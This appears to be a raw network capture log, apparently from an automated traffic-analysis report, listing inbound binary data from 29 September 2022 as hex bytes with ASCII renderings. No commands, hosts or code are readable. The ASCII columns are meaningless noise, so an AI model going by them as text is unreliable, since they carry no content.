                                                                                                                                                2022-09-29 12:49:37 UTC8288INData Raw: 91 08 6f f4 53 5d c6 0d 6b e3 9b 23 5d 18 04 87 4f 73 00 55 e3 15 8e a9 70 7f 8d 4d 54 c1 e2 7c 58 b7 22 b2 3f a7 4f 54 fb c7 6a dd 7c bc 9e ec ee e1 fd 27 cf f7 c2 a4 70 06 57 ae df 97 9a 3c bf 13 1e 64 59 09 98 03 7d d4 5a 85 0a a3 18 f6 08 50 e4 04 cb 23 31 02 b3 ac 82 c9 6e 8b d3 4a 18 a0 ce e2 b9 f9 3e d0 7e 8c e7 70 b0 b9 84 2a 0d bb 66 17 80 8e e2 f8 b3 a0 15 ec b4 de eb a3 c2 25 b8 f6 6e fd 9d bc 24 67 ec 41 40 90 ce 8e 95 63 d8 fc 13 79 9d 64 66 09 6d 6f 43 ac f1 a3 ec 70 e8 83 ce 35 49 0e bc 4a 13 8c 1d c4 ad c5 aa cd 1d 0f 6c a3 bd 96 c0 9d 1c 77 c4 80 1f e3 9d 20 ae 06 43 0d aa 72 dd 31 35 e4 f7 9c e2 d8 bc 88 21 3f cb 0b cc 6f 7c 3a c3 67 9e 82 6d c9 3b e9 03 c1 23 69 26 6c bf a4 26 c6 d2 3a 31 18 5a 3a e1 7e 3e c0 a7 ca ad 0d 38 16 78 2f 2a
                                                                                                                                                Data Ascii: oS]k#]OsUpMT|X"?OTj|'pW<dY}ZP#1nJ>~p*f%n$gA@cydfmoCp5IJlw Cr15!?o|:gm;#i&l&:1Z:~>8x/*
                                                                                                                                                2022-09-29 12:49:37 UTC8304INData Raw: c4 6f 4e c9 e2 c4 f5 7e 26 04 a0 05 18 28 91 42 12 fc 65 c1 8a 79 39 9d b0 52 e1 38 a5 85 bb 58 5b c6 a2 9d d1 d0 27 35 bf fa d0 65 80 2a 95 e9 20 e0 14 c3 41 9c 20 20 67 d9 7b 64 05 64 e2 e2 06 31 2e 61 84 83 e2 9f 83 cd 88 68 c6 de 94 db 29 74 33 d3 4e 9f 0a 76 5c 22 00 6a 24 b3 3b 2c 37 ba a1 bd 02 4d ec 79 0c 98 e5 5b 4f a9 af bb 5a 7a de 9e 1f ea 88 6e b4 28 c8 93 a0 c6 12 5f 1b 07 29 24 29 c3 5c 22 3f 09 3f 65 82 d9 42 be 17 31 93 c2 9f 30 00 4e c0 1c 81 38 41 c5 3e f7 d5 fd 5f 3f 5c 01 45 aa 3f a3 5b ec db c1 f7 8d 84 b1 1b 9d 50 48 2a db 12 99 28 7a 0b f9 cc 9b d6 c2 eb 20 f8 8d eb 26 22 61 26 3c 81 a2 35 eb 23 ca 7a d5 b7 5d 40 47 f0 b5 9d 06 cb 44 33 30 d7 20 d0 6d a4 50 f3 c6 1e 7b f0 f9 2f 9e 02 ee cc e2 cb 69 b6 76 fb f2 1c 7c b3 0d be 75 5e
                                                                                                                                                Data Ascii: oN~&(Bey9R8X['5e* A g{dd1.ah)t3Nv\"j$;,7My[OZzn(_)$)\"??eB10N8A>_?\E?[PH*(z &"a&<5#z]@GD30 mP{/iv|u^
                                                                                                                                                2022-09-29 12:49:37 UTC8320INData Raw: f7 92 a7 76 b0 07 e5 ea e3 b2 ca 32 3e 2d 77 60 1b 30 d9 ed 07 61 e5 0c d2 82 05 d5 b5 97 53 1c 39 22 f7 77 2a 10 07 39 f7 eb 44 25 83 0b 65 71 70 cb 03 05 d0 db 68 11 d8 b0 a2 19 ef 55 ca 6e 2d b0 53 0a 5a b8 2e 9d f8 a8 33 04 19 c2 a1 95 20 1e 4e ef b3 b2 e6 52 e5 f4 d4 e6 0d ea 2d bc 7c ae 93 8f 93 b4 0c f4 64 fb 71 26 03 5a 99 74 b5 98 cb d1 1e d9 66 ee 96 12 f5 ec 3a dc 05 5c 4e 48 91 76 0f 66 7b 8f 2a 27 e1 db 7e fa c0 8c f4 a5 70 5c 36 04 ec 81 c3 7f 5e fe ef c9 2f 7a 13 c8 7f 3b 15 f2 db 9b a8 db 03 c5 fe 7e 9f e2 65 19 94 d6 a4 c1 33 7d 0d 41 ea 47 7c 1b a1 6f 65 0d 20 74 2f 11 56 4f d5 c7 f6 03 7e 1c 01 d5 25 73 57 52 5b 87 f1 06 9c 07 5e 9c 14 4f e6 c1 d2 14 4a cc bd 34 32 ee 3e 49 fe f3 52 8a 8c d7 b4 ca f9 73 4b a1 d4 d9 b5 ff 4e 54 79 39 01
                                                                                                                                                Data Ascii: v2>-w`0aS9"w*9D%eqphUn-SZ.3 NR-|dq&Ztf:\NHvf{*'~p\6^/z;~e3}AG|oe t/VO~%sWR[^OJ42>IRsKNTy9
                                                                                                                                                2022-09-29 12:49:37 UTC8336INData Raw: eb 61 05 af 2b ba c3 d8 3d 51 d6 41 d8 a2 74 6d f0 58 53 51 12 44 b4 f6 6f 7a aa 0a 71 af 30 7c 65 1f e2 9b 7a 47 25 ee 57 a2 8d 37 7f 82 18 9d ad b9 c6 fa 8a 96 da d4 33 cb 0d 83 5e f9 88 ec 67 7d 60 05 e4 e5 0b 01 ca 4d 0b 6b 50 5a 45 e0 1b 6c 14 2d cf 03 89 8a 78 a6 c6 57 ff 4d 45 bc 7c 1d d9 db bb ce f5 15 c3 3d 4a 33 fd f4 c7 f5 b3 bc 01 33 fd 8d ae 54 04 58 22 4b 13 e9 b9 88 12 0d 8e a6 c4 e6 fa 53 ce d1 7c 99 39 01 c3 0b 42 10 75 56 dc 74 39 09 94 49 dd 4a 47 fa e2 3d 7c d3 d5 db 05 a1 a6 e9 87 a1 70 36 d1 01 51 e5 55 fe 17 77 2e 34 a0 da 4f 17 7f 11 f3 38 bf 47 3d df 7d 8c 4c 2f 84 28 1f e8 89 19 7b 19 17 db c3 cb d2 8b 08 a0 68 dd 51 bb d2 72 8e ec 7c 68 6c b8 cf 10 84 be e5 d5 b1 79 a2 8e ea f0 bf 04 ff fc c7 f0 cc 6d 73 f8 9a 57 66 6a 73 ce f6
                                                                                                                                                Data Ascii: a+=QAtmXSQDozq0|ezG%W73^g}`MkPZEl-xWME|=J33TX"KS|9BuVt9IJG=|p6QUw.4O8G=}L/({hQr|hlymsWfjs
                                                                                                                                                2022-09-29 12:49:37 UTC8352INData Raw: c2 f0 67 ef 8b 79 0f c7 f3 f3 88 31 73 0b 0a 41 4d 25 51 2c 64 cf e8 88 0b ae 8c f2 ba cd 22 83 36 2f 63 b7 0c 75 6d 7b ef 27 f1 32 94 ac 1b 34 76 e1 14 74 e4 f2 c7 a5 96 2a 67 5d 3a c5 c7 5d 20 11 0a e4 8e 0f bb 94 e3 f3 c1 16 4c 2d 47 2f 0a 81 85 ef 47 03 f6 08 78 ad 40 44 d0 9f aa 5b 31 d0 69 c0 4d f5 df 5a 9a 3e 1c 0b e8 58 83 5b 51 5f 2d c3 68 c5 fd 2f bf 4f e6 54 3b d0 74 2e cc 78 91 7b 61 00 c8 44 5f 8c f4 2d 5a 90 09 b4 2a fb 0a bc 69 72 59 bc f9 3c 63 77 92 af ef 84 00 c9 39 74 fa a6 f8 b7 f7 18 8e f6 c6 45 ea 09 e2 8c a7 b5 96 fc d1 7e 82 4f f9 1f 7c 28 ef f6 30 b4 f6 be 45 d5 25 1e 89 19 f6 f4 a8 ba 99 ca a7 5e 59 60 16 20 5b 81 f6 b3 d2 f4 72 02 06 9f a1 cd 56 b7 38 8e b2 06 5d 3a 9a 2a 8b fe ea d1 3f b5 c2 7e 16 5d c0 31 5f 3d 95 bf d5 b3 09
                                                                                                                                                Data Ascii: gy1sAM%Q,d"6/cum{'24vt*g]:] L-G/Gx@D[1iMZ>X[Q_-h/OT;t.x{aD_-Z*irY<cw9tE~O|(0E%^Y` [rV8]:*?~]1_=
                                                                                                                                                2022-09-29 12:49:37 UTC8368INData Raw: 98 a3 90 8c 13 bd 7c 97 2f 52 a6 97 fb d5 2a 86 cd 45 c6 c6 e8 2e d6 33 dd 42 b7 55 94 3f 7e 8f 56 de bf 9e 9b ea 97 1d 81 0b f1 8d 97 d2 60 50 99 93 12 b9 64 50 4c cd 9d b1 ec ce 56 b7 18 17 2c 33 c5 9d eb 1d 17 e9 66 58 a4 90 e6 b4 77 25 df 82 12 f4 fa 67 9c 34 fd ec a4 b8 3c cb 45 5a d2 4c 25 23 13 85 91 39 cb 5f e8 1b 48 0f 62 78 d6 ef 88 0f f1 32 17 c3 5b cf 76 db 24 48 59 be 2a 5c 4d 30 97 25 bd ec c7 6c 3f 65 e6 7e ef 14 e9 93 89 45 ba 19 21 88 e1 c7 35 18 f7 dc 7a ab 16 3b 6e a3 3a cc a7 f9 f9 61 bd e3 97 71 57 50 b8 78 0f 0e ac 11 d6 08 86 b0 7a f3 48 e2 59 53 ba 76 d3 28 d7 65 f3 c7 dd b8 01 71 30 36 31 12 3f b1 4c 7f ca ed fd b8 ec a1 77 04 45 a0 55 87 18 d7 05 eb f4 66 46 6c 07 34 df 02 13 81 e7 ea 69 cc ff 17 a2 32 4c 49 94 45 53 c3 ee e9 06
                                                                                                                                                Data Ascii: |/R*E.3BU?~V`PdPLV,3fXw%g4<EZL%#9_Hbx2[v$HY*\M0%l?e~E!5z;n:aqWPxzHYSv(eq061?LwEUfFl4i2LIES
                                                                                                                                                2022-09-29 12:49:37 UTC8384INData Raw: 10 f9 21 7c 6f 6e 91 bd 72 6b 2b 94 6e 38 6b b2 16 6d d3 4c 84 56 41 91 da 10 da f2 d2 2c bb 21 5d ae a6 0f 5b 5a 46 8b 4e 13 78 26 3f 5e f3 40 b3 57 f5 8a 11 57 22 71 29 4b 22 a5 c2 bd f8 83 22 5e 19 4d ba b6 78 b7 ba 2e 74 b2 32 49 f5 a4 15 e1 3e b9 02 f8 68 b0 dc a6 96 e0 ed d9 2d 66 95 15 7b 18 53 34 d5 51 20 1d 5e c1 7d 9b 96 f5 46 ab e3 92 1e 17 e1 cc 40 00 02 e3 ca c9 5f dc 7e 41 34 00 a4 6a 8c 93 c9 75 a9 53 2c 0b c0 be f2 47 1f 6e 40 7c d5 6d d7 53 33 b2 dc 22 37 68 3f 82 5b 4d ec 05 2e 9a 16 f7 6d 21 75 18 93 1d ab 72 6d ca f7 fc b8 52 ca 39 3e 55 33 4a b3 3f 7c 96 df 51 f6 9e 0c b1 10 b8 35 c2 09 6f 53 65 e6 41 79 26 91 4e 90 7c ed 29 55 b7 0d e7 96 6b f0 a9 31 28 4f 39 20 0b d0 c1 ab be 01 67 66 d8 8f 7b fd 0d dc 04 fd 0d 17 01 90 04 77 59 2f
                                                                                                                                                Data Ascii: !|onrk+n8kmLVA,!][ZFNx&?^@WW"q)K""^Mx.t2I>h-f{S4Q ^}F@_~A4juS,Gn@|mS3"7h?[M.m!urmR9>U3J?|Q5oSeAy&N|)Uk1(O9 gf{wY/
                                                                                                                                                2022-09-29 12:49:37 UTC8400INData Raw: 39 44 4e 04 c2 06 60 0f 6e 61 21 05 3b cd 1e b8 11 c7 bb 7e 0d eb 90 48 99 e2 71 f1 4e 5a 64 89 08 7c c7 b9 a7 50 fb 26 96 fd 27 6d 8e eb b5 67 20 bc 41 e8 4b b0 ac 98 5a da c7 1a 26 28 ed 5c b3 2e e8 47 07 71 55 34 f4 de 3e bd bc e1 86 d4 a5 68 64 74 62 dd 31 57 e3 ef 70 2b 2f 3f 8e 13 29 c1 a1 17 20 58 10 4c dc 2b c5 2c ba 8a dd ca 48 aa ca 2e 7a 55 16 70 40 d9 43 de 0d 93 6a 93 23 98 03 1c 89 7e ca 64 1e 26 dd a7 b9 66 16 0a a6 e4 29 d1 55 db b4 18 e1 d9 86 e8 73 70 a4 90 13 3f cd a5 90 bc ba 29 77 79 66 5a 48 7e 5a f6 c0 97 03 71 4d d9 bf 46 f9 53 f9 79 c4 73 c6 b2 f4 86 12 ac 9e df b7 8c e4 ba 7a a3 d0 77 96 5e db bb 8e 56 e2 bb 5d 1e e0 6a 1e 8b 88 b7 da 42 c1 1a 4f b2 ab 4b 50 1a 17 ee 37 32 44 7d c6 92 4f 49 34 46 05 6e b8 50 a3 4d 1b 45 a4 f8 05
                                                                                                                                                Data Ascii: 9DN`na!;~HqNZd|P&'mg AKZ&(\.GqU4>hdtb1Wp+/?) XL+,H.zUp@Cj#~d&f)Usp?)wyfZH~ZqMFSyszw^V]jBOKP72D}OI4FnPME
                                                                                                                                                2022-09-29 12:49:37 UTC8416INData Raw: fc fe 77 df c0 00 49 b5 f4 a3 c8 51 36 aa a5 38 dc 4a 1b 6d 5c e8 35 b7 33 af e0 51 f6 b5 0e ba 90 db 8f ef b0 49 f8 d9 59 a6 0b b5 54 15 79 07 76 5b 06 86 80 5b 48 da b5 c9 48 5d bc 5c 4f d4 ec a1 ae ae 12 00 6c 73 36 fd f7 34 25 8f e1 04 fa d4 7d 10 01 04 dc 46 d7 58 7f 17 74 3c 9d 12 02 4f ab 02 cc 7b 75 c5 3d ef 56 97 5b 16 92 71 d7 21 eb 2b 95 c6 a3 22 83 a8 c1 18 f7 1c 29 b4 82 69 8c d0 58 20 ed 14 01 1d c6 c0 f2 b9 37 31 93 a2 e1 6e 49 b3 6e 11 85 8d e5 92 2c ce 82 fb 38 9d 23 6f ff a3 5b 49 0e 97 74 2f eb 54 67 bb de 5c 6b 6c 50 83 c7 63 e3 46 b8 9c 7f 8a c9 13 31 dd d8 32 ea 80 21 3e 55 7a 0e 24 32 16 08 58 a0 de 70 8a 93 76 26 a2 fd e4 e2 a0 e2 d8 3c f1 01 eb 87 ea 7a cc 13 38 83 1e 62 dc 64 ad 4f 03 6e df 4e 8e 33 0d 10 0b ca d8 da 85 72 42 f7
                                                                                                                                                Data Ascii: wIQ68Jm\53QIYTyv[[HH]\Ols64%}FXt<O{u=V[q!+")iX 71nIn,8#o[It/Tg\klPcF12!>Uz$2Xpv&<z8bdOnN3rB
                                                                                                                                                2022-09-29 12:49:37 UTC8432INData Raw: 70 41 66 9d 2d 0d fa 7d 3a 8d 97 32 46 01 dd 0c 1b 81 90 63 7c e0 fe 0f d8 63 64 22 75 d4 b0 64 8a 3b 97 b9 0f 10 32 ce 0a a7 6e 30 18 5b e0 0a 2e 11 2d 75 d0 1f fa 12 ba 20 f7 03 04 36 0c a6 b2 7b a9 06 3a 81 ad d0 fb fa 44 41 b0 3e 15 52 0d 70 b0 37 03 1c 12 7e 0c a1 95 0d e5 1e 55 62 00 08 16 03 2a 18 1b 82 14 95 3b f2 24 37 3c 57 73 38 15 d4 2c d6 8c 73 d5 de bf d5 83 71 b7 42 43 93 4e d0 12 4d 6c 5e c1 55 fb f3 d5 f6 eb 7a f1 bc ab c8 0d ed f8 c5 c4 cb 09 68 0b 91 d6 bd ab 67 18 d4 04 5f 02 f6 b5 4c 23 a3 13 db 13 8a 7b 05 9f 3f e0 53 3e 86 29 b7 14 ac 6e 2e 4f 56 8f 7b dc d9 13 10 73 00 2f 35 8a c2 40 bc 0e ce 18 c9 a4 4f 97 6d 58 5c 31 0f 92 45 75 cc d6 cc e4 41 5b 53 fc 3d 23 c7 a4 d6 e9 c5 66 aa 47 32 93 00 74 70 2a 99 68 c8 84 c5 9e e2 b2 79 5d
                                                                                                                                                Data Ascii: pAf-}:2Fc|cd"ud;2n0[.-u 6{:DA>Rp7~Ub*;$7<Ws8,sqBCNMl^Uzhg_L#{?S>)n.OV{s/5@OmX\1EuA[S=#fG2tp*hy]
                                                                                                                                                2022-09-29 12:49:37 UTC8448INData Raw: 5f 8a 06 ad cf 13 6f 48 48 df b1 f3 b1 f8 9e 1e 54 de c8 81 52 75 15 ff 26 cc 8e b7 03 e3 0f ea 90 a0 e6 1a 3b 30 2c 87 43 7b 45 81 58 88 1b 07 ba 25 cb 5b 77 23 e1 b3 32 7d 7e d6 ca b8 a8 d5 ae 94 43 28 2a 43 d0 78 f3 4e e0 6a 4a d2 3b eb 81 9c f7 a0 9d e5 f5 46 82 44 ae 01 f4 d1 bf 29 93 16 0b 4f da 30 66 6b 4d 54 00 cf 99 b2 4d 26 65 1b 10 2e 0f 4a 11 8c cf 40 31 e7 fa a8 ee 87 85 24 07 c9 be 27 84 77 16 9c 95 9f dc 59 b6 b1 64 2a 03 dd 4f 4d ed c0 e8 99 02 e9 e0 be 32 13 3a 92 35 84 20 54 7f af 0b 3c 1b c5 e7 e7 01 72 c7 d0 54 39 57 1c eb d5 fe 2a 03 27 d9 73 9d 61 c5 ce e8 89 19 a9 2b 27 97 3e fb da fe 7d 68 4b d9 a4 0f ac 1d 8b fc d9 d7 b1 7f 58 c4 57 76 a5 86 57 32 65 5b 43 b9 1a e2 8b 7a 61 37 7a c1 ba 45 eb 76 c3 03 ae 7c 92 34 1a 6a e2 f0 b4 6f
                                                                                                                                                Data Ascii: _oHHTRu&;0,C{EX%[w#2}~C(*CxNjJ;FD)O0fkMTM&e.J@1$'wYd*OM2:5 T<rT9W*'sa+'>}hKXWvW2e[Cza7zEv|4jo
                                                                                                                                                2022-09-29 12:49:37 UTC8464INData Raw: a9 a2 0e 3a 46 74 42 be 03 66 61 b1 45 27 36 0f c4 f5 de 4a 94 7c a3 99 85 d2 f6 4f 0c 1c 2c 4b de 6d a5 7f 5d af 6d 1f c3 d1 17 63 d0 fd 35 ab 01 0b 9f c4 24 3a 5a 73 6b 05 16 68 78 7d bc e1 54 af bf 01 04 fb 13 be 16 34 bd ae 58 55 c6 fc 7d d7 20 d3 e2 a9 d4 e4 4c 96 41 58 74 60 b5 14 21 b0 47 88 7f 20 f0 c3 9d cb ac 69 77 14 45 2f e5 e9 3e 91 32 31 f0 3e 93 c6 41 4d 84 79 1e 6d d4 7f 5e b7 08 e8 e4 2a 50 d0 9b 93 9f a3 15 54 f7 b7 41 65 ad ef 1b 2b 76 fc 6a c7 b1 85 90 54 c3 8d 23 33 eb 42 9e 29 3b 8d 2b fe 05 75 09 8e 4f 8e 21 80 c2 4f f1 4c d3 a4 73 5d c8 1a 3e 96 38 da 5e 15 59 4e 7a 7c 73 e3 34 4d 0d 14 5d 76 bb 7d 50 01 72 3c f7 ee a3 48 2a dd 6d 4c 04 0d 0d 87 38 99 d0 86 d7 27 0c a2 50 ed 06 1b 80 49 04 37 7a 8f bd fb 46 f5 c2 6b 11 32 ae 53 27
                                                                                                                                                Data Ascii: :FtBfaE'6J|O,Km]mc5$:Zskhx}T4XU} LAXt`!G iwE/>21>AMym^*PTAe+vjT#3B);+uO!OLs]>8^YNz|s4M]v}Pr<H*mL8'PI7zFk2S'
                                                                                                                                                2022-09-29 12:49:37 UTC8480INData Raw: 14 8a fb bd 18 25 dd af 61 a3 3a c7 00 46 54 42 af 79 b5 2b 51 5a 1a 9a 6d 60 83 04 ce 55 24 d4 b7 37 ca ba fb 1c 39 5d a5 ca ec 92 91 e2 79 34 18 1c fc 0c 41 e1 a2 60 fd 5b b9 90 ca 03 a6 b4 9f c3 87 04 a8 51 2c 6c 7c 12 e6 d5 6a 48 4d 0d f6 4b 2d ec 8f f5 22 4d 94 92 8e 75 a2 b1 f1 a2 68 17 89 e8 11 6a ce 37 77 37 fa e3 16 8f 59 85 77 b5 3c c2 53 67 0f ab 0f 0a 42 19 12 41 0b e0 19 34 b5 e8 07 0a 63 f9 6e 10 bf ad 10 9c 99 66 d6 c6 00 51 10 09 99 13 06 9e e0 61 3a d3 15 ee 16 ae de 7f 63 57 1d 50 b4 c3 23 96 80 b2 02 ef d1 74 2d 84 d3 bb 4a fc a3 f0 53 d1 da eb aa b2 37 da 91 64 3f 68 fd 20 68 7b 11 bf 0c c0 2a cf e2 41 1b ca 99 32 d4 cb 2f d3 25 d1 66 5a 8c 1e 99 29 d8 64 d0 ba 61 dc cd 13 85 2c 57 1e c0 46 84 1a 0e 57 b7 af dc a6 1e a5 1b ff e0 4f a0
                                                                                                                                                Data Ascii: %a:FTBy+QZm`U$79]y4A`[Q,l|jHMK-"Muhj7w7Yw<SgBA4cnfQa:cWP#t-JS7d?h h{*A2/%fZ)da,WFWO
                                                                                                                                                2022-09-29 12:49:37 UTC8496INData Raw: 06 06 50 6a 96 71 91 05 15 4a bb ad ad f6 47 90 97 8a d1 fc e7 46 ec 23 ce 96 da 88 3d 19 a7 bf fb b8 e7 9d 57 c5 6b b2 89 41 d8 5c f0 76 f0 8b 4d 63 80 52 be 3b 90 0c 69 22 9b 34 c2 26 48 99 4c 63 72 7c 3e aa 5a fa 7c 09 43 2a 65 ef f7 29 57 a6 06 fe 38 28 e3 a8 1e fc e5 2c 1e c0 06 75 fb 78 82 fd ed 26 cd 09 54 8b 33 3d e4 0f 9a 82 90 72 73 94 bb 95 5f 4c 57 53 f1 4c 77 80 f1 77 b9 7a f6 fb ed f0 fa 28 f3 2b 50 7a 86 13 9b 0a 5c 29 57 43 f3 d9 4b ab eb 02 fb 28 0a 6c 7b e0 a2 3a d3 d4 f6 37 a3 9b c5 11 48 9c fa fc 19 0a 0b 65 2b b3 37 f9 7d 9a 06 7c 98 50 14 75 75 2e 49 af a7 2d f4 73 e1 3d fc 71 df e8 b8 81 14 9e c7 0d 78 4a 2e 0b c3 26 30 a4 6a 12 24 42 98 95 41 ad fd 12 c5 f5 7d de f6 41 0c 45 75 26 d2 63 a7 e2 ae de 95 f9 3a 77 50 05 db 8e c5 db 82
                                                                                                                                                Data Ascii: PjqJGF#=WkA\vMcR;i"4&HLcr|>Z|C*e)W8(,ux&T3=rs_LWSLwwz(+Pz\)WCK(l{:7He+7}|Puu.I-s=qxJ.&0j$BA}AEu&c:wP
                                                                                                                                                2022-09-29 12:49:37 UTC8512INData Raw: 2b 8f d6 34 c6 d6 63 9e 68 d2 e0 6b dd fa 1b 50 9d f4 30 33 e5 76 47 3f ad 61 ed cc bd 68 05 7d bc f1 19 c8 86 97 b5 8c 3b 25 46 ef 60 26 63 51 82 a2 38 84 c0 ea f5 4a 32 13 a7 2f 3b ce 15 fd 53 bb f2 40 36 87 6f 57 26 fa 0f 33 87 e4 9a d8 26 68 aa 3f f9 ac 70 4e 42 4a 20 03 a8 d4 ee 3b 9b 67 a1 fc 9a a1 f6 be b6 52 c1 f0 21 3d c5 63 70 4f 4d 69 db 9c 75 b7 d0 b9 a9 5d 7c e8 4a 08 9b 2d 6c 1c 14 86 64 61 c9 6e 38 11 71 df 0e dc ea 97 07 70 8a e3 4e 85 8f 36 78 f8 c7 f7 5c bf 9d 77 3f ee f5 48 39 82 43 29 a3 15 16 08 fb 74 29 63 0b 1e dc b8 c2 a4 3f 96 24 2b 05 da 20 fc cf aa 26 00 d4 0a c1 7d 67 5a 67 3a 84 31 9a 8a df d7 12 96 3d 2e 4a 63 e4 a7 fa 4d ee 35 1d 59 44 7d 68 c8 83 d1 18 bf 7a 67 ff c6 09 34 71 26 5a 89 aa 7c 49 7d c8 0f ca 4c 32 73 e9 3e cd
                                                                                                                                                Data Ascii: +4chkP03vG?ah};%F`&cQ8J2/;S@6oW&3&h?pNBJ ;gR!=cpOMiu]|J-ldan8qpN6x\w?H9C)t)c?$+ &}gZg:1=.JcM5YD}hzg4q&Z|I}L2s>
                                                                                                                                                2022-09-29 12:49:37 UTC8528INData Raw: f4 26 41 73 88 38 98 50 6f 37 0d 02 7f 32 73 c3 be 42 3b c7 2d 04 3b dd 8d e6 c6 b1 bd 80 fd b7 2f 87 88 f4 2d 5c 70 8c dc 1c a9 03 6b 72 39 20 22 93 a2 f6 19 63 f2 81 5c f7 c0 42 57 9d ad f4 51 62 c2 db 06 2e 5b 8a 97 ee 49 47 c4 78 18 30 06 55 44 8a 8f 2e 62 10 fc 83 15 98 47 b4 2b 12 4c 23 d4 86 dc 4c eb 55 39 0b ef 4e 80 cf 1a d4 06 9a d7 ae 24 fb ef a1 da c2 24 16 e2 7e cc 0c 57 71 0d 6a ce 6d be 06 a9 05 77 c8 52 7e 1d 95 74 52 0f 87 8a d9 c1 a9 81 42 18 be 89 30 97 ea a0 d4 a1 71 91 7c 48 68 f5 b1 82 d3 0f f0 a8 64 78 a4 2f f0 1d 8b 41 f1 3d 27 b6 27 7b 6e 6b 29 b5 56 5c 86 d6 ab 85 48 ab 78 7c f2 98 1d f0 b9 34 01 83 d4 6a 37 2a 49 c0 c4 08 c7 38 58 1a 94 02 30 33 3e f9 85 16 c3 84 b5 02 35 37 6a 67 10 d5 d3 76 a2 4f 9f f9 bf 46 40 33 99 d1 55 a5
                                                                                                                                                Data Ascii: &As8Po72sB;-;/-\pkr9 "c\BWQb.[IGx0UD.bG+L#LU9N$$~WqjmwR~tRB0q|Hhdx/A=''{nk)V\Hx|4j7*I8X03>57jgvOF@3U
                                                                                                                                                2022-09-29 12:49:37 UTC8531INData Raw: bc 9f f5 c2 8b 28 c9 c1 64 89 ba 53 7f e7 96 97 12 04 4f 6f 5a bd 3c 2a ad 92 58 68 8a b6 dd a2 14 6e e8 56 d5 a3 50 e5 ff 54 9f 01 96 86 48 65 b8 03 a6 ad 85 d6 fb af 0a d1 2c d0 c6 63 6b 72 8b fd 4b 7b a4 3e 00 80 68 98 13 c5 b5 3d be f4 fd 9a b5 65 89 10 89 bd e0 8e df 0e 6b 20 e5 0c 91 6b 73 61 06 15 eb b5 ef ea 69 e8 11 3a 6d 43 be 05 d7 ea a2 bf c0 5f 8a 43 f3 f4 38 54 58 f0 85 1c 2a 60 c3 b7 99 33 7c 82 2e dc 66 f1 e5 c7 ab 24 b9 c7 b8 07 32 22 f7 2a d2 71 8a 88 2c 36 1b 86 34 e6 28 40 8d 8b 4a a1 3e 97 73 02 0e 60 c2 33 60 d7 2c 85 20 c2 07 36 24 08 ce 53 cf 0a f1 d7 98 77 70 2f e9 1a 34 43 db af 4b 82 56 b2 04 9a 7b f4 8e 6c a2 99 10 9e b0 69 78 a4 19 d8 19 c0 64 54 44 3a b4 ed 10 4a 2b a8 31 f2 7c 3b d7 ea 82 02 c3 7f f0 76 a6 5e 3c 35 8c e8 3c
                                                                                                                                                Data Ascii: (dSOoZ<*XhnVPTHe,ckrK{>h=ek ksai:mC_C8TX*`3|.f$2"*q,64(@J>s`3`, 6$Swp/4CKV{lixdTD:J+1|;v^<5<
                                                                                                                                                2022-09-29 12:49:37 UTC8547INData Raw: 15 09 c5 d5 37 ea 0b a8 bd d3 36 0b 05 d8 82 20 6d 6e f7 09 70 96 c3 6d a1 9b 62 52 e2 09 e2 56 31 35 b9 7a 63 bc 33 45 00 b5 d1 f1 3e 09 21 9e 03 50 53 91 07 aa e8 f1 44 a4 05 71 88 73 7c 0c d4 64 5e 64 8e 18 69 17 fa 1e 3b ee c2 9b 55 65 80 49 2d 0e 1e 81 c3 c6 c5 3d 1c 7b 53 34 f0 8d e9 a3 26 93 e9 30 31 d9 f7 bb 5a e8 ed 78 17 69 ba e1 3e ac 51 9d 49 1c ee a0 f7 fb 5d 02 27 6f e2 f8 6e b7 3f c6 9b f7 8a 41 14 f7 99 ef 0a 7f a8 8a 55 66 1e 7d f3 39 af 7b d4 d1 87 b3 29 00 fc ef 5a 1e 72 18 82 ad fc ea 7e b4 a1 7e c8 b0 62 e1 d5 c8 ed d8 fd d8 37 13 51 bc f2 18 8e dd 5f 7a 12 d9 cb 21 2c 05 19 a5 9f b2 69 be 37 b6 52 82 2b 38 77 64 48 d5 53 77 3b 4d 08 09 3f bd eb 5a 67 95 c3 ec e4 9e 33 b8 bb 21 11 52 68 ac d4 13 47 37 b3 42 40 28 5f 0c 3b 0f 07 95 33
                                                                                                                                                Data Ascii: 76 mnpmbRV15zc3E>!PSDqs|d^di;UeI-={S4&01Zxi>QI]'on?AUf}9{)Zr~~b7Q_z!,i7R+8wdHSw;M?Zg3!RhG7B@(_;3
                                                                                                                                                2022-09-29 12:49:37 UTC8563INData Raw: a9 d6 5b 6e d6 86 e2 26 a1 13 a9 c6 ff 9f 41 fe db 68 d3 a5 a0 51 9d 5b 62 0d 9c 42 f1 eb 63 03 dd e7 88 6a 53 22 08 49 f5 43 5c f9 3b a3 1a c4 03 36 c9 4f 43 0a dc 43 a8 8e fc a2 11 f1 12 51 35 65 92 fb c2 95 a7 7a 23 d7 ce 9e 47 62 04 0a 1d 89 36 99 f8 27 4c 16 ce 64 b9 a1 6b 93 f7 16 dc 84 17 da c3 ea e2 26 91 7b e0 64 9a ec c0 8a 7f ea 09 0d b3 56 11 6c 14 41 71 67 d4 dc 01 01 36 ad 5a 18 cf ea fe 6c 29 2f 1f 30 a8 9a 0c be 3d 1d a3 1a 29 a2 3e cc 5b fb f8 06 bf 5a c6 59 b2 33 aa 16 e2 6c 3c c1 f6 7d b4 39 70 97 d0 7d c1 03 cc 87 e1 ea c2 72 3b af 52 ba 60 c1 4c 09 92 5e 44 dd 8a 61 3d 4b a9 71 6e 29 a0 e5 04 4d 10 18 c9 40 89 09 4e bd 99 bb 9c ff 27 cb b6 7b d2 02 31 57 7f b7 8d eb 0e e6 04 eb b6 53 e1 1f 0e d7 c7 11 a7 d2 a5 79 4a 6d cf 92 3a 9f 07
                                                                                                                                                Data Ascii: [n&AhQ[bBcjS"IC\;6OCCQ5ez#Gb6'Ldk&{dVlAqg6Zl)/0=)>[ZY3l<}9p}r;R`L^Da=Kqn)M@N'{1WSyJm:
